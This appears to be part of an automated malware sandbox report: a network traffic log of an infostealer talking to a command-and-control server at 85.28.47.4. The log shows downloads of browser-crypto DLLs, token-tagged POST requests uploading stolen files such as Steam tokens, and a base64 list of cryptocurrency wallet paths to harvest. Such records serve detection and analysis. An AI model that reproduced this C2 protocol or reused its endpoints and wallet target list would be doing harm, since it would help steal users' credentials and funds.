                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 [TRUNCATED]
                                                                Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="file"------JEHJKJEBGHJJKEBGIECA--
                                                                Jul 3, 2024 08:38:15.644769907 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:14 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=92
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:15.935923100 CEST89OUTGET /69934896f997d5bb/freebl3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:16.113509893 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:16 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "a7550-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 685392
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                Jul 3, 2024 08:38:16.760209084 CEST89OUTGET /69934896f997d5bb/mozglue.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:16.934945107 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:16 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "94750-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 608080
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                Jul 3, 2024 08:38:17.337558985 CEST90OUTGET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:17.512134075 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:17 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "6dde8-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 450024
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                Jul 3, 2024 08:38:17.874159098 CEST86OUTGET /69934896f997d5bb/nss3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:18.049907923 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:17 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "1f3950-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 2046288
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                Jul 3, 2024 08:38:19.469039917 CEST90OUTGET /69934896f997d5bb/softokn3.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:19.646547079 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:19 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "3ef50-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 257872
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                Jul 3, 2024 08:38:19.790718079 CEST94OUTGET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                                                                Host: 85.28.47.4
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:19.965508938 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:19 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "13bf0-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 80880
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                Jul 3, 2024 08:38:20.701340914 CEST197OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA
                                                                Host: 85.28.47.4
                                                                Content-Length: 947
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 3, 2024 08:38:21.529583931 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:20 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=85
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:21.625646114 CEST464OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBF
                                                                Host: 85.28.47.4
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 2d 2d 0d 0a
                                                                Data Ascii: ------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="message"wallets------EHJKKKFIIJJKJKFIECBF--
                                                                Jul 3, 2024 08:38:21.802306890 CEST1236INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:21 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 2408
                                                                Keep-Alive: timeout=5, max=84
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                Jul 3, 2024 08:38:21.805831909 CEST462OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE
                                                                Host: 85.28.47.4
                                                                Content-Length: 265
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a
                                                                Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
                                                                Jul 3, 2024 08:38:21.981946945 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:21 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=83
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:22.000190020 CEST560OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJD
                                                                Host: 85.28.47.4
                                                                Content-Length: 363
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="file"------DBAEHCGHIIIDHIECFHJD--
                                                                Jul 3, 2024 08:38:22.701109886 CEST202INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:22 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=82
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 3, 2024 08:38:22.730226994 CEST467OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIII
                                                                Host: 85.28.47.4
                                                                Content-Length: 270
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 2d 2d 0d 0a
                                                                Data Ascii: ------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="message"jbdtaijovg------ECAKECAEGDHIECBGHIII--
                                                                Jul 3, 2024 08:38:23.439107895 CEST331INHTTP/1.1 200 OK
                                                                Date: Wed, 03 Jul 2024 06:38:22 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 104
                                                                Keep-Alive: timeout=5, max=81
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
